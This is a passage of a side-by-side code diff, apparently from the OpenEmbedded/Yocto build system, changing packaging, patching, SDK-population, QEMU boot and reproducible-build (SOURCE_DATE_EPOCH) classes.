1990 pkgconfig_provided[pkg] = [] 2023 pkgconfig_provided[pkg] = []
1991 pkgconfig_needed[pkg] = [] 2024 pkgconfig_needed[pkg] = []
1992 for file in pkgfiles[pkg]: 2025 for file in sorted(pkgfiles[pkg]):
1993 m = pc_re.match(file) 2026 m = pc_re.match(file)
1994 if m: 2027 if m:
1995 pd = bb.data.init() 2028 pd = bb.data.init()
1996 name = m.group(1) 2029 name = m.group(1)
1997 pkgconfig_provided[pkg].append(name) 2030 pkgconfig_provided[pkg].append(os.path.basename(name))
1998 if not os.access(file, os.R_OK): 2031 if not os.access(file, os.R_OK):
1999 continue 2032 continue
2000 with open(file, 'r') as f: 2033 with open(file, 'r') as f:
@@ -2017,7 +2050,7 @@ python package_do_pkgconfig () {
2017 pkgs_file = os.path.join(shlibswork_dir, pkg + ".pclist") 2050 pkgs_file = os.path.join(shlibswork_dir, pkg + ".pclist")
2018 if pkgconfig_provided[pkg] != []: 2051 if pkgconfig_provided[pkg] != []:
2019 with open(pkgs_file, 'w') as f: 2052 with open(pkgs_file, 'w') as f:
2020 for p in pkgconfig_provided[pkg]: 2053 for p in sorted(pkgconfig_provided[pkg]):
2021 f.write('%s\n' % p) 2054 f.write('%s\n' % p)
2022 2055
2023 # Go from least to most specific since the last one found wins 2056 # Go from least to most specific since the last one found wins
diff --git a/meta/classes/package_deb.bbclass b/meta/classes/package_deb.bbclass
index 790b26aef2..fa8c6c82ff 100644
--- a/meta/classes/package_deb.bbclass
+++ b/meta/classes/package_deb.bbclass
@@ -315,8 +315,8 @@ do_package_write_deb[dirs] = "${PKGWRITEDIRDEB}"
315do_package_write_deb[cleandirs] = "${PKGWRITEDIRDEB}" 315do_package_write_deb[cleandirs] = "${PKGWRITEDIRDEB}"
316do_package_write_deb[umask] = "022" 316do_package_write_deb[umask] = "022"
317do_package_write_deb[depends] += "${@oe.utils.build_depends_string(d.getVar('PACKAGE_WRITE_DEPS'), 'do_populate_sysroot')}" 317do_package_write_deb[depends] += "${@oe.utils.build_depends_string(d.getVar('PACKAGE_WRITE_DEPS'), 'do_populate_sysroot')}"
318addtask package_write_deb after do_packagedata do_package 318EPOCHTASK ??= ""
319 319addtask package_write_deb after do_packagedata do_package ${EPOCHTASK}
320 320
321PACKAGEINDEXDEPS += "dpkg-native:do_populate_sysroot" 321PACKAGEINDEXDEPS += "dpkg-native:do_populate_sysroot"
322PACKAGEINDEXDEPS += "apt-native:do_populate_sysroot" 322PACKAGEINDEXDEPS += "apt-native:do_populate_sysroot"
diff --git a/meta/classes/package_ipk.bbclass b/meta/classes/package_ipk.bbclass
index c008559e4a..4927cfba00 100644
--- a/meta/classes/package_ipk.bbclass
+++ b/meta/classes/package_ipk.bbclass
@@ -274,7 +274,8 @@ do_package_write_ipk[dirs] = "${PKGWRITEDIRIPK}"
274do_package_write_ipk[cleandirs] = "${PKGWRITEDIRIPK}" 274do_package_write_ipk[cleandirs] = "${PKGWRITEDIRIPK}"
275do_package_write_ipk[umask] = "022" 275do_package_write_ipk[umask] = "022"
276do_package_write_ipk[depends] += "${@oe.utils.build_depends_string(d.getVar('PACKAGE_WRITE_DEPS'), 'do_populate_sysroot')}" 276do_package_write_ipk[depends] += "${@oe.utils.build_depends_string(d.getVar('PACKAGE_WRITE_DEPS'), 'do_populate_sysroot')}"
277addtask package_write_ipk after do_packagedata do_package 277EPOCHTASK ??= ""
278addtask package_write_ipk after do_packagedata do_package ${EPOCHTASK}
278 279
279PACKAGEINDEXDEPS += "opkg-utils-native:do_populate_sysroot" 280PACKAGEINDEXDEPS += "opkg-utils-native:do_populate_sysroot"
280PACKAGEINDEXDEPS += "opkg-native:do_populate_sysroot" 281PACKAGEINDEXDEPS += "opkg-native:do_populate_sysroot"
diff --git a/meta/classes/package_pkgdata.bbclass b/meta/classes/package_pkgdata.bbclass
index 18b7ed62e0..a1ea8fc041 100644
--- a/meta/classes/package_pkgdata.bbclass
+++ b/meta/classes/package_pkgdata.bbclass
@@ -162,6 +162,6 @@ python package_prepare_pkgdata() {
162 162
163} 163}
164package_prepare_pkgdata[cleandirs] = "${WORKDIR_PKGDATA}" 164package_prepare_pkgdata[cleandirs] = "${WORKDIR_PKGDATA}"
165package_prepare_pkgdata[vardepsexclude] += "MACHINE_ARCH PACKAGE_EXTRA_ARCHS SDK_ARCH BUILD_ARCH SDK_OS BB_TASKDEPDATA" 165package_prepare_pkgdata[vardepsexclude] += "MACHINE_ARCH PACKAGE_EXTRA_ARCHS SDK_ARCH BUILD_ARCH SDK_OS BB_TASKDEPDATA SSTATETASKS"
166 166
167 167
diff --git a/meta/classes/package_rpm.bbclass b/meta/classes/package_rpm.bbclass
index 95731c7d8d..65587d228b 100644
--- a/meta/classes/package_rpm.bbclass
+++ b/meta/classes/package_rpm.bbclass
@@ -678,11 +678,12 @@ python do_package_rpm () {
678 cmd = cmd + " --define '_use_internal_dependency_generator 0'" 678 cmd = cmd + " --define '_use_internal_dependency_generator 0'"
679 cmd = cmd + " --define '_binaries_in_noarch_packages_terminate_build 0'" 679 cmd = cmd + " --define '_binaries_in_noarch_packages_terminate_build 0'"
680 cmd = cmd + " --define '_build_id_links none'" 680 cmd = cmd + " --define '_build_id_links none'"
681 cmd = cmd + " --define '_binary_payload w6T.xzdio'" 681 cmd = cmd + " --define '_binary_payload w6T%d.xzdio'" % int(d.getVar("XZ_THREADS"))
682 cmd = cmd + " --define '_source_payload w6T.xzdio'" 682 cmd = cmd + " --define '_source_payload w6T%d.xzdio'" % int(d.getVar("XZ_THREADS"))
683 cmd = cmd + " --define 'clamp_mtime_to_source_date_epoch 1'" 683 cmd = cmd + " --define 'clamp_mtime_to_source_date_epoch 1'"
684 cmd = cmd + " --define 'use_source_date_epoch_as_buildtime 1'" 684 cmd = cmd + " --define 'use_source_date_epoch_as_buildtime 1'"
685 cmd = cmd + " --define '_buildhost reproducible'" 685 cmd = cmd + " --define '_buildhost reproducible'"
686 cmd = cmd + " --define '__font_provides %{nil}'"
686 if perfiledeps: 687 if perfiledeps:
687 cmd = cmd + " --define '__find_requires " + outdepends + "'" 688 cmd = cmd + " --define '__find_requires " + outdepends + "'"
688 cmd = cmd + " --define '__find_provides " + outprovides + "'" 689 cmd = cmd + " --define '__find_provides " + outprovides + "'"
@@ -742,7 +743,8 @@ do_package_write_rpm[dirs] = "${PKGWRITEDIRRPM}"
742do_package_write_rpm[cleandirs] = "${PKGWRITEDIRRPM}" 743do_package_write_rpm[cleandirs] = "${PKGWRITEDIRRPM}"
743do_package_write_rpm[umask] = "022" 744do_package_write_rpm[umask] = "022"
744do_package_write_rpm[depends] += "${@oe.utils.build_depends_string(d.getVar('PACKAGE_WRITE_DEPS'), 'do_populate_sysroot')}" 745do_package_write_rpm[depends] += "${@oe.utils.build_depends_string(d.getVar('PACKAGE_WRITE_DEPS'), 'do_populate_sysroot')}"
745addtask package_write_rpm after do_packagedata do_package 746EPOCHTASK ??= ""
747addtask package_write_rpm after do_packagedata do_package ${EPOCHTASK}
746 748
747PACKAGEINDEXDEPS += "rpm-native:do_populate_sysroot" 749PACKAGEINDEXDEPS += "rpm-native:do_populate_sysroot"
748PACKAGEINDEXDEPS += "createrepo-c-native:do_populate_sysroot" 750PACKAGEINDEXDEPS += "createrepo-c-native:do_populate_sysroot"
diff --git a/meta/classes/patch.bbclass b/meta/classes/patch.bbclass
index 25ec089ae1..484d27ac76 100644
--- a/meta/classes/patch.bbclass
+++ b/meta/classes/patch.bbclass
@@ -131,6 +131,9 @@ python patch_do_patch() {
131 patchdir = parm["patchdir"] 131 patchdir = parm["patchdir"]
132 if not os.path.isabs(patchdir): 132 if not os.path.isabs(patchdir):
133 patchdir = os.path.join(s, patchdir) 133 patchdir = os.path.join(s, patchdir)
134 if not os.path.isdir(patchdir):
135 bb.fatal("Target directory '%s' not found, patchdir '%s' is incorrect in patch file '%s'" %
136 (patchdir, parm["patchdir"], parm['patchname']))
134 else: 137 else:
135 patchdir = s 138 patchdir = s
136 139
@@ -147,12 +150,12 @@ python patch_do_patch() {
147 patchset.Import({"file":local, "strippath": parm['striplevel']}, True) 150 patchset.Import({"file":local, "strippath": parm['striplevel']}, True)
148 except Exception as exc: 151 except Exception as exc:
149 bb.utils.remove(process_tmpdir, True) 152 bb.utils.remove(process_tmpdir, True)
150 bb.fatal(str(exc)) 153 bb.fatal("Importing patch '%s' with striplevel '%s'\n%s" % (parm['patchname'], parm['striplevel'], str(exc)))
151 try: 154 try:
152 resolver.Resolve() 155 resolver.Resolve()
153 except bb.BBHandledException as e: 156 except bb.BBHandledException as e:
154 bb.utils.remove(process_tmpdir, True) 157 bb.utils.remove(process_tmpdir, True)
155 bb.fatal(str(e)) 158 bb.fatal("Applying patch '%s' on target directory '%s'\n%s" % (parm['patchname'], patchdir, str(e)))
156 159
157 bb.utils.remove(process_tmpdir, True) 160 bb.utils.remove(process_tmpdir, True)
158 del os.environ['TMPDIR'] 161 del os.environ['TMPDIR']
diff --git a/meta/classes/populate_sdk_base.bbclass b/meta/classes/populate_sdk_base.bbclass
index dea272c441..49fdfaa93d 100644
--- a/meta/classes/populate_sdk_base.bbclass
+++ b/meta/classes/populate_sdk_base.bbclass
@@ -51,6 +51,8 @@ TOOLCHAIN_OUTPUTNAME ?= "${SDK_NAME}-toolchain-${SDK_VERSION}"
51SDK_ARCHIVE_TYPE ?= "tar.xz" 51SDK_ARCHIVE_TYPE ?= "tar.xz"
52SDK_XZ_COMPRESSION_LEVEL ?= "-9" 52SDK_XZ_COMPRESSION_LEVEL ?= "-9"
53SDK_XZ_OPTIONS ?= "${XZ_DEFAULTS} ${SDK_XZ_COMPRESSION_LEVEL}" 53SDK_XZ_OPTIONS ?= "${XZ_DEFAULTS} ${SDK_XZ_COMPRESSION_LEVEL}"
54SDK_ZIP_OPTIONS ?= "-y"
55
54 56
55# To support different sdk type according to SDK_ARCHIVE_TYPE, now support zip and tar.xz 57# To support different sdk type according to SDK_ARCHIVE_TYPE, now support zip and tar.xz
56python () { 58python () {
@@ -58,7 +60,7 @@ python () {
58 d.setVar('SDK_ARCHIVE_DEPENDS', 'zip-native') 60 d.setVar('SDK_ARCHIVE_DEPENDS', 'zip-native')
59 # SDK_ARCHIVE_CMD used to generate archived sdk ${TOOLCHAIN_OUTPUTNAME}.${SDK_ARCHIVE_TYPE} from input dir ${SDK_OUTPUT}/${SDKPATH} to output dir ${SDKDEPLOYDIR} 61 # SDK_ARCHIVE_CMD used to generate archived sdk ${TOOLCHAIN_OUTPUTNAME}.${SDK_ARCHIVE_TYPE} from input dir ${SDK_OUTPUT}/${SDKPATH} to output dir ${SDKDEPLOYDIR}
60 # recommand to cd into input dir first to avoid archive with buildpath 62 # recommand to cd into input dir first to avoid archive with buildpath
61 d.setVar('SDK_ARCHIVE_CMD', 'cd ${SDK_OUTPUT}/${SDKPATH}; zip -r -y ${SDKDEPLOYDIR}/${TOOLCHAIN_OUTPUTNAME}.${SDK_ARCHIVE_TYPE} .') 63 d.setVar('SDK_ARCHIVE_CMD', 'cd ${SDK_OUTPUT}/${SDKPATH}; zip -r ${SDK_ZIP_OPTIONS} ${SDKDEPLOYDIR}/${TOOLCHAIN_OUTPUTNAME}.${SDK_ARCHIVE_TYPE} .')
62 else: 64 else:
63 d.setVar('SDK_ARCHIVE_DEPENDS', 'xz-native') 65 d.setVar('SDK_ARCHIVE_DEPENDS', 'xz-native')
64 d.setVar('SDK_ARCHIVE_CMD', 'cd ${SDK_OUTPUT}/${SDKPATH}; tar ${SDKTAROPTS} -cf - . | xz ${SDK_XZ_OPTIONS} > ${SDKDEPLOYDIR}/${TOOLCHAIN_OUTPUTNAME}.${SDK_ARCHIVE_TYPE}') 66 d.setVar('SDK_ARCHIVE_CMD', 'cd ${SDK_OUTPUT}/${SDKPATH}; tar ${SDKTAROPTS} -cf - . | xz ${SDK_XZ_OPTIONS} > ${SDKDEPLOYDIR}/${TOOLCHAIN_OUTPUTNAME}.${SDK_ARCHIVE_TYPE}')
@@ -66,7 +68,7 @@ python () {
66 68
67SDK_RDEPENDS = "${TOOLCHAIN_TARGET_TASK} ${TOOLCHAIN_HOST_TASK}" 69SDK_RDEPENDS = "${TOOLCHAIN_TARGET_TASK} ${TOOLCHAIN_HOST_TASK}"
68SDK_DEPENDS = "virtual/fakeroot-native ${SDK_ARCHIVE_DEPENDS} cross-localedef-native nativesdk-qemuwrapper-cross ${@' '.join(["%s-qemuwrapper-cross" % m for m in d.getVar("MULTILIB_VARIANTS").split()])} qemuwrapper-cross" 70SDK_DEPENDS = "virtual/fakeroot-native ${SDK_ARCHIVE_DEPENDS} cross-localedef-native nativesdk-qemuwrapper-cross ${@' '.join(["%s-qemuwrapper-cross" % m for m in d.getVar("MULTILIB_VARIANTS").split()])} qemuwrapper-cross"
69PATH_prepend = "${STAGING_DIR_HOST}${SDKPATHNATIVE}${bindir}/crossscripts:${@":".join(all_multilib_tune_values(d, 'STAGING_BINDIR_CROSS').split())}:" 71PATH_prepend = "${WORKDIR}/recipe-sysroot/${SDKPATHNATIVE}${bindir}/crossscripts:${@":".join(all_multilib_tune_values(d, 'STAGING_BINDIR_CROSS').split())}:"
70SDK_DEPENDS += "nativesdk-glibc-locale" 72SDK_DEPENDS += "nativesdk-glibc-locale"
71 73
72# We want the MULTIARCH_TARGET_SYS to point to the TUNE_PKGARCH, not PACKAGE_ARCH as it 74# We want the MULTIARCH_TARGET_SYS to point to the TUNE_PKGARCH, not PACKAGE_ARCH as it
@@ -178,7 +180,7 @@ do_populate_sdk[sstate-inputdirs] = "${SDKDEPLOYDIR}"
178do_populate_sdk[sstate-outputdirs] = "${SDK_DEPLOY}" 180do_populate_sdk[sstate-outputdirs] = "${SDK_DEPLOY}"
179do_populate_sdk[stamp-extra-info] = "${MACHINE_ARCH}${SDKMACHINE}" 181do_populate_sdk[stamp-extra-info] = "${MACHINE_ARCH}${SDKMACHINE}"
180 182
181PSEUDO_IGNORE_PATHS .= ",${SDKDEPLOYDIR}" 183PSEUDO_IGNORE_PATHS .= ",${SDKDEPLOYDIR},${WORKDIR}/oe-sdk-repo,${WORKDIR}/sstate-build-populate_sdk"
182 184
183fakeroot create_sdk_files() { 185fakeroot create_sdk_files() {
184 cp ${COREBASE}/scripts/relocate_sdk.py ${SDK_OUTPUT}/${SDKPATH}/ 186 cp ${COREBASE}/scripts/relocate_sdk.py ${SDK_OUTPUT}/${SDKPATH}/
@@ -275,6 +277,7 @@ EOF
275 # substitute variables 277 # substitute variables
276 sed -i -e 's#@SDK_ARCH@#${SDK_ARCH}#g' \ 278 sed -i -e 's#@SDK_ARCH@#${SDK_ARCH}#g' \
277 -e 's#@SDKPATH@#${SDKPATH}#g' \ 279 -e 's#@SDKPATH@#${SDKPATH}#g' \
280 -e 's#@SDKPATHINSTALL@#${SDKPATHINSTALL}#g' \
278 -e 's#@SDKEXTPATH@#${SDKEXTPATH}#g' \ 281 -e 's#@SDKEXTPATH@#${SDKEXTPATH}#g' \
279 -e 's#@OLDEST_KERNEL@#${SDK_OLDEST_KERNEL}#g' \ 282 -e 's#@OLDEST_KERNEL@#${SDK_OLDEST_KERNEL}#g' \
280 -e 's#@REAL_MULTIMACH_TARGET_SYS@#${REAL_MULTIMACH_TARGET_SYS}#g' \ 283 -e 's#@REAL_MULTIMACH_TARGET_SYS@#${REAL_MULTIMACH_TARGET_SYS}#g' \
@@ -324,6 +327,13 @@ def sdk_variables(d):
324 327
325do_populate_sdk[vardeps] += "${@sdk_variables(d)}" 328do_populate_sdk[vardeps] += "${@sdk_variables(d)}"
326 329
330python () {
331 variables = sdk_command_variables(d)
332 for var in variables:
333 if d.getVar(var, False):
334 d.setVarFlag(var, 'func', '1')
335}
336
327do_populate_sdk[file-checksums] += "${TOOLCHAIN_SHAR_REL_TMPL}:True \ 337do_populate_sdk[file-checksums] += "${TOOLCHAIN_SHAR_REL_TMPL}:True \
328 ${TOOLCHAIN_SHAR_EXT_TMPL}:True" 338 ${TOOLCHAIN_SHAR_EXT_TMPL}:True"
329 339
diff --git a/meta/classes/populate_sdk_ext.bbclass b/meta/classes/populate_sdk_ext.bbclass
index 71686bc993..1bdfd92847 100644
--- a/meta/classes/populate_sdk_ext.bbclass
+++ b/meta/classes/populate_sdk_ext.bbclass
@@ -117,7 +117,7 @@ python write_host_sdk_ext_manifest () {
117 f.write("%s %s %s\n" % (info[1], info[2], info[3])) 117 f.write("%s %s %s\n" % (info[1], info[2], info[3]))
118} 118}
119 119
120SDK_POSTPROCESS_COMMAND_append_task-populate-sdk-ext = "write_target_sdk_ext_manifest; write_host_sdk_ext_manifest; " 120SDK_POSTPROCESS_COMMAND_append_task-populate-sdk-ext = " write_target_sdk_ext_manifest; write_host_sdk_ext_manifest; "
121 121
122SDK_TITLE_task-populate-sdk-ext = "${@d.getVar('DISTRO_NAME') or d.getVar('DISTRO')} Extensible SDK" 122SDK_TITLE_task-populate-sdk-ext = "${@d.getVar('DISTRO_NAME') or d.getVar('DISTRO')} Extensible SDK"
123 123
@@ -247,7 +247,9 @@ python copy_buildsystem () {
247 247
248 # Create a layer for new recipes / appends 248 # Create a layer for new recipes / appends
249 bbpath = d.getVar('BBPATH') 249 bbpath = d.getVar('BBPATH')
250 bb.process.run(['devtool', '--bbpath', bbpath, '--basepath', baseoutpath, 'create-workspace', '--create-only', os.path.join(baseoutpath, 'workspace')]) 250 env = os.environ.copy()
251 env['PYTHONDONTWRITEBYTECODE'] = '1'
252 bb.process.run(['devtool', '--bbpath', bbpath, '--basepath', baseoutpath, 'create-workspace', '--create-only', os.path.join(baseoutpath, 'workspace')], env=env)
251 253
252 # Create bblayers.conf 254 # Create bblayers.conf
253 bb.utils.mkdirhier(baseoutpath + '/conf') 255 bb.utils.mkdirhier(baseoutpath + '/conf')
@@ -360,6 +362,10 @@ python copy_buildsystem () {
360 # Hide the config information from bitbake output (since it's fixed within the SDK) 362 # Hide the config information from bitbake output (since it's fixed within the SDK)
361 f.write('BUILDCFG_HEADER = ""\n\n') 363 f.write('BUILDCFG_HEADER = ""\n\n')
362 364
365 # Write METADATA_REVISION
366 # Needs distro override so it can override the value set in the bbclass code (later than local.conf)
367 f.write('METADATA_REVISION:%s = "%s"\n\n' % (d.getVar('DISTRO'), d.getVar('METADATA_REVISION')))
368
363 f.write('# Provide a flag to indicate we are in the EXT_SDK Context\n') 369 f.write('# Provide a flag to indicate we are in the EXT_SDK Context\n')
364 f.write('WITHIN_EXT_SDK = "1"\n\n') 370 f.write('WITHIN_EXT_SDK = "1"\n\n')
365 371
@@ -664,7 +670,7 @@ sdk_ext_postinst() {
664 670
665 # A bit of another hack, but we need this in the path only for devtool 671 # A bit of another hack, but we need this in the path only for devtool
666 # so put it at the end of $PATH. 672 # so put it at the end of $PATH.
667 echo "export PATH=$target_sdk_dir/sysroots/${SDK_SYS}${bindir_nativesdk}:\$PATH" >> $env_setup_script 673 echo "export PATH=\"$target_sdk_dir/sysroots/${SDK_SYS}${bindir_nativesdk}:\$PATH\"" >> $env_setup_script
668 674
669 echo "printf 'SDK environment now set up; additionally you may now run devtool to perform development tasks.\nRun devtool --help for further details.\n'" >> $env_setup_script 675 echo "printf 'SDK environment now set up; additionally you may now run devtool to perform development tasks.\nRun devtool --help for further details.\n'" >> $env_setup_script
670 676
diff --git a/meta/classes/pypi.bbclass b/meta/classes/pypi.bbclass
index 87b4c85fc0..c68367449a 100644
--- a/meta/classes/pypi.bbclass
+++ b/meta/classes/pypi.bbclass
@@ -24,3 +24,5 @@ S = "${WORKDIR}/${PYPI_PACKAGE}-${PV}"
24 24
25UPSTREAM_CHECK_URI ?= "https://pypi.org/project/${PYPI_PACKAGE}/" 25UPSTREAM_CHECK_URI ?= "https://pypi.org/project/${PYPI_PACKAGE}/"
26UPSTREAM_CHECK_REGEX ?= "/${PYPI_PACKAGE}/(?P<pver>(\d+[\.\-_]*)+)/" 26UPSTREAM_CHECK_REGEX ?= "/${PYPI_PACKAGE}/(?P<pver>(\d+[\.\-_]*)+)/"
27
28CVE_PRODUCT ?= "python:${PYPI_PACKAGE}"
diff --git a/meta/classes/python3targetconfig.bbclass b/meta/classes/python3targetconfig.bbclass
index fc1025c207..a6e67f1bf8 100644
--- a/meta/classes/python3targetconfig.bbclass
+++ b/meta/classes/python3targetconfig.bbclass
@@ -15,3 +15,15 @@ do_compile_prepend_class-target() {
15do_install_prepend_class-target() { 15do_install_prepend_class-target() {
16 export _PYTHON_SYSCONFIGDATA_NAME="_sysconfigdata" 16 export _PYTHON_SYSCONFIGDATA_NAME="_sysconfigdata"
17} 17}
18
19do_configure:prepend:class-nativesdk() {
20 export _PYTHON_SYSCONFIGDATA_NAME="_sysconfigdata"
21}
22
23do_compile:prepend:class-nativesdk() {
24 export _PYTHON_SYSCONFIGDATA_NAME="_sysconfigdata"
25}
26
27do_install:prepend:class-nativesdk() {
28 export _PYTHON_SYSCONFIGDATA_NAME="_sysconfigdata"
29}
diff --git a/meta/classes/qemuboot.bbclass b/meta/classes/qemuboot.bbclass
index 648af09b6e..92ae69d9f2 100644
--- a/meta/classes/qemuboot.bbclass
+++ b/meta/classes/qemuboot.bbclass
@@ -7,6 +7,7 @@
7# QB_OPT_APPEND: options to append to qemu, e.g., "-show-cursor" 7# QB_OPT_APPEND: options to append to qemu, e.g., "-show-cursor"
8# 8#
9# QB_DEFAULT_KERNEL: default kernel to boot, e.g., "bzImage" 9# QB_DEFAULT_KERNEL: default kernel to boot, e.g., "bzImage"
10# e.g., "bzImage-initramfs-qemux86-64.bin" if INITRAMFS_IMAGE_BUNDLE is set to 1.
10# 11#
11# QB_DEFAULT_FSTYPE: default FSTYPE to boot, e.g., "ext4" 12# QB_DEFAULT_FSTYPE: default FSTYPE to boot, e.g., "ext4"
12# 13#
@@ -75,7 +76,7 @@
75 76
76QB_MEM ?= "-m 256" 77QB_MEM ?= "-m 256"
77QB_SERIAL_OPT ?= "-serial mon:stdio -serial null" 78QB_SERIAL_OPT ?= "-serial mon:stdio -serial null"
78QB_DEFAULT_KERNEL ?= "${KERNEL_IMAGETYPE}" 79QB_DEFAULT_KERNEL ?= "${@bb.utils.contains("INITRAMFS_IMAGE_BUNDLE", "1", "${KERNEL_IMAGETYPE}-${INITRAMFS_LINK_NAME}.bin", "${KERNEL_IMAGETYPE}", d)}"
79QB_DEFAULT_FSTYPE ?= "ext4" 80QB_DEFAULT_FSTYPE ?= "ext4"
80QB_OPT_APPEND ?= "-show-cursor" 81QB_OPT_APPEND ?= "-show-cursor"
81QB_NETWORK_DEVICE ?= "-device virtio-net-pci,netdev=net0,mac=@MAC@" 82QB_NETWORK_DEVICE ?= "-device virtio-net-pci,netdev=net0,mac=@MAC@"
diff --git a/meta/classes/report-error.bbclass b/meta/classes/report-error.bbclass
index 1a12db1206..de48e4ff0f 100644
--- a/meta/classes/report-error.bbclass
+++ b/meta/classes/report-error.bbclass
@@ -64,6 +64,8 @@ python errorreport_handler () {
64 data['failures'] = [] 64 data['failures'] = []
65 data['component'] = " ".join(e.getPkgs()) 65 data['component'] = " ".join(e.getPkgs())
66 data['branch_commit'] = str(base_detect_branch(e.data)) + ": " + str(base_detect_revision(e.data)) 66 data['branch_commit'] = str(base_detect_branch(e.data)) + ": " + str(base_detect_revision(e.data))
67 data['bitbake_version'] = e.data.getVar("BB_VERSION")
68 data['layer_version'] = get_layers_branch_rev(e.data)
67 data['local_conf'] = get_conf_data(e, 'local.conf') 69 data['local_conf'] = get_conf_data(e, 'local.conf')
68 data['auto_conf'] = get_conf_data(e, 'auto.conf') 70 data['auto_conf'] = get_conf_data(e, 'auto.conf')
69 lock = bb.utils.lockfile(datafile + '.lock') 71 lock = bb.utils.lockfile(datafile + '.lock')
diff --git a/meta/classes/reproducible_build.bbclass b/meta/classes/reproducible_build.bbclass
index 2f3bd90b07..3c01dbd5b3 100644
--- a/meta/classes/reproducible_build.bbclass
+++ b/meta/classes/reproducible_build.bbclass
@@ -1,17 +1,38 @@
1# reproducible_build.bbclass 1# reproducible_build.bbclass
2# 2#
3# Sets SOURCE_DATE_EPOCH in each component's build environment. 3# Sets the default SOURCE_DATE_EPOCH in each component's build environment.
4# The format is number of seconds since the system epoch.
5#
4# Upstream components (generally) respect this environment variable, 6# Upstream components (generally) respect this environment variable,
5# using it in place of the "current" date and time. 7# using it in place of the "current" date and time.
6# See https://reproducible-builds.org/specs/source-date-epoch/ 8# See https://reproducible-builds.org/specs/source-date-epoch/
7# 9#
8# After sources are unpacked but before they are patched, we set a reproducible value for SOURCE_DATE_EPOCH. 10# The default value of SOURCE_DATE_EPOCH comes from the function
9# This value should be reproducible for anyone who builds the same revision from the same sources. 11# get_source_date_epoch_value which reads from the SDE_FILE, or if the file
12# is not available (or set to 0) will use the fallback of
13# SOURCE_DATE_EPOCH_FALLBACK.
14#
15# The SDE_FILE is normally constructed from the function
16# create_source_date_epoch_stamp which is typically added as a postfuncs to
17# the do_unpack task. If a recipe does NOT have do_unpack, it should be added
18# to a task that runs after the source is available and before the
19# do_deploy_source_date_epoch task is executed.
20#
21# If a recipe wishes to override the default behavior it should set it's own
22# SOURCE_DATE_EPOCH or override the do_deploy_source_date_epoch_stamp task
23# with recipe-specific functionality to write the appropriate
24# SOURCE_DATE_EPOCH into the SDE_FILE.
25#
26# SOURCE_DATE_EPOCH is intended to be a reproducible value. This value should
27# be reproducible for anyone who builds the same revision from the same
28# sources.
10# 29#
11# There are 4 ways we determine SOURCE_DATE_EPOCH: 30# There are 4 ways the create_source_date_epoch_stamp function determines what
31# becomes SOURCE_DATE_EPOCH:
12# 32#
13# 1. Use the value from __source_date_epoch.txt file if this file exists. 33# 1. Use the value from __source_date_epoch.txt file if this file exists.
14# This file was most likely created in the previous build by one of the following methods 2,3,4. 34# This file was most likely created in the previous build by one of the
35# following methods 2,3,4.
15# Alternatively, it can be provided by a recipe via SRC_URI. 36# Alternatively, it can be provided by a recipe via SRC_URI.
16# 37#
17# If the file does not exist: 38# If the file does not exist:
@@ -22,25 +43,24 @@
22# 3. Use the mtime of "known" files such as NEWS, CHANGLELOG, ... 43# 3. Use the mtime of "known" files such as NEWS, CHANGLELOG, ...
23# This works for well-kept repositories distributed via tarball. 44# This works for well-kept repositories distributed via tarball.
24# 45#
25# 4. Use the modification time of the youngest file in the source tree, if there is one. 46# 4. Use the modification time of the youngest file in the source tree, if
47# there is one.
26# This will be the newest file from the distribution tarball, if any. 48# This will be the newest file from the distribution tarball, if any.
27# 49#
28# 5. Fall back to a fixed timestamp. 50# 5. Fall back to a fixed timestamp (SOURCE_DATE_EPOCH_FALLBACK).
29# 51#
30# Once the value of SOURCE_DATE_EPOCH is determined, it is stored in the recipe's SDE_FILE. 52# Once the value is determined, it is stored in the recipe's SDE_FILE.
31# If none of these mechanisms are suitable, replace the do_deploy_source_date_epoch task
32# with recipe-specific functionality to write the appropriate SOURCE_DATE_EPOCH into the SDE_FILE.
33#
34# If this file is found by other tasks, the value is exported in the SOURCE_DATE_EPOCH variable.
35# SOURCE_DATE_EPOCH is set for all tasks that might use it (do_configure, do_compile, do_package, ...)
36 53
37BUILD_REPRODUCIBLE_BINARIES ??= '1' 54BUILD_REPRODUCIBLE_BINARIES ??= '1'
38inherit ${@oe.utils.ifelse(d.getVar('BUILD_REPRODUCIBLE_BINARIES') == '1', 'reproducible_build_simple', '')} 55inherit reproducible_build_simple
39 56
40SDE_DIR ="${WORKDIR}/source-date-epoch" 57SDE_DIR = "${WORKDIR}/source-date-epoch"
41SDE_FILE = "${SDE_DIR}/__source_date_epoch.txt" 58SDE_FILE = "${SDE_DIR}/__source_date_epoch.txt"
42SDE_DEPLOYDIR = "${WORKDIR}/deploy-source-date-epoch" 59SDE_DEPLOYDIR = "${WORKDIR}/deploy-source-date-epoch"
43 60
61# A SOURCE_DATE_EPOCH of '0' might be misinterpreted as no SDE
62export SOURCE_DATE_EPOCH_FALLBACK ??= "1302044400"
63
44SSTATETASKS += "do_deploy_source_date_epoch" 64SSTATETASKS += "do_deploy_source_date_epoch"
45 65
46do_deploy_source_date_epoch () { 66do_deploy_source_date_epoch () {
@@ -74,45 +94,47 @@ python create_source_date_epoch_stamp() {
74 import oe.reproducible 94 import oe.reproducible
75 95
76 epochfile = d.getVar('SDE_FILE') 96 epochfile = d.getVar('SDE_FILE')
77 # If it exists we need to regenerate as the sources may have changed 97 tmp_file = "%s.new" % epochfile
78 if os.path.isfile(epochfile):
79 bb.debug(1, "Deleting existing SOURCE_DATE_EPOCH from: %s" % epochfile)
80 os.remove(epochfile)
81 98
82 source_date_epoch = oe.reproducible.get_source_date_epoch(d, d.getVar('S')) 99 source_date_epoch = oe.reproducible.get_source_date_epoch(d, d.getVar('S'))
83 100
84 bb.debug(1, "SOURCE_DATE_EPOCH: %d" % source_date_epoch) 101 bb.debug(1, "SOURCE_DATE_EPOCH: %d" % source_date_epoch)
85 bb.utils.mkdirhier(d.getVar('SDE_DIR')) 102 bb.utils.mkdirhier(d.getVar('SDE_DIR'))
86 with open(epochfile, 'w') as f: 103 with open(tmp_file, 'w') as f:
87 f.write(str(source_date_epoch)) 104 f.write(str(source_date_epoch))
105
106 os.rename(tmp_file, epochfile)
88} 107}
89 108
109EPOCHTASK = "do_deploy_source_date_epoch"
110
111# Generate the stamp after do_unpack runs
112do_unpack[postfuncs] += "create_source_date_epoch_stamp"
113
90def get_source_date_epoch_value(d): 114def get_source_date_epoch_value(d):
91 cached = d.getVar('__CACHED_SOURCE_DATE_EPOCH') 115 epochfile = d.getVar('SDE_FILE')
92 if cached: 116 cached, efile = d.getVar('__CACHED_SOURCE_DATE_EPOCH') or (None, None)
117 if cached and efile == epochfile:
93 return cached 118 return cached
94 119
95 epochfile = d.getVar('SDE_FILE') 120 if cached and epochfile != efile:
